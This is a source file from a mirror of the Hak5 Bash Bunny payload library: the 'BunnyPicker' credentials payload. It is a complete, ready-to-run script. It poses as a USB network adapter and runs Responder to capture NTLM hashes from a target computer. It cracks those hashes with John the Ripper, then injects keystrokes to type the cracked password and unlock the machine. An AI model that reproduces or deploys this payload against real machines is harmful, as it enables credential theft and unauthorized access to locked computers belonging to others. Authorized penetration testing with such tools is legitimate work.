hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
98bfe076031d76db9fbc4e9b4edb9afa2c869da2
bashbunny-payloads/payloads/library/credentials/BunnyPicker/payload.txt
rf-bandit b4ba117e41 Update payload.txt
2023-06-01 07:25:39 -06:00

112 lines
2.8 KiB
Bash
Raw Blame History

#!/bin/bash
#
#Author: rf_bandit
#Version: Version 1.0
#Credit: Hak5Darren, Mubix, catatonic, mame82
#Firmware: 1.7
#Date: May 2023
#
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/bunnypicker
WORDFILE= <PATH TO DICTIONARY HERE>
#eg /tools/john/password.lst
# or install via tools folding in arming mode (/tools/<wordlist>)
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
# Check for responder and john
REQUIRETOOL responder
REQUIRETOOL john
# Setup Attack
LED SETUP
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
ATTACKMODE HID RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET
# Set convenience variables
GET TARGET_HOSTNAME
GET TARGET_IP
# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT
# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
LED FAIL2
exit 1
fi
# Set LED yellow, run attack
LED ATTACK
cd /tools/responder
# Clean logs directory
rm logs/*
# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &
# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
# Ima just loop here until NTLM logs are found
sleep 1
done
# copy logs to loot directory
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
cp logs/* $LOOTDIR/$HOST-$COUNT
# Sync USB disk filesystem
sync
#kill responder
killall python
killall python
killall python
#Cracking begins!
cd /tools/john
LED STAGE1
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
#We could go CUCMBER PLAID here but its probably not needed
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
# Check john.pot If empty blink RED and end. Move to offline attack.
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
LED FAIL3
exit 1
fi
#This will copy our cracked password to the loot folder for future use.
LED STAGE2
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
#This should unlock the machine with our cracked password.
#$PAYLOAD_DIR would not work with QUACK
QUACK ESC
DELAY 100
QUACK $SWITCH_POSITION/pass.txt
QUACK ENTER
rm $PAYLOAD_DIR/pass.txt
LED CLEANUP
sync
# When the light turns green its a hacked machine.
LED FINISH
Reference in New Issue View Git Blame Copy Permalink